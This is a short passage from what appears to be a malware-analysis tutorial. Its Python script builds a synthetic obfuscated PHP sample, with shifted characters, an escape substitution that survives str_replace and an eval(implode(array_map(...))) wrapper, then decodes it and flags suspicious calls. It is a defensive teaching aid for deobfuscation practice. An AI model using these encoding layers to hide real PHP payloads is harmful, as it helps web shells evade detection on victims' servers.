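    shifted = "".join(chr(ord(c) + 1) for c in plain)      # '$' becomes '%'
    hidden = shifted.replace('%', '%x5c%x7825')            # survives str_replace
    level2 = 'eval(implode(array_map("fjfgg",str_split("' + hidden + '"))));'
    return scatter(level2)

if __name__ == "__main__":
    pairs, data = build_sample()
    print(unwrap(pairs, data))
```

Running it prints the constructed plaintext back; suspicious_calls() over real decoded output gives a quick list of the capabilities to look at first.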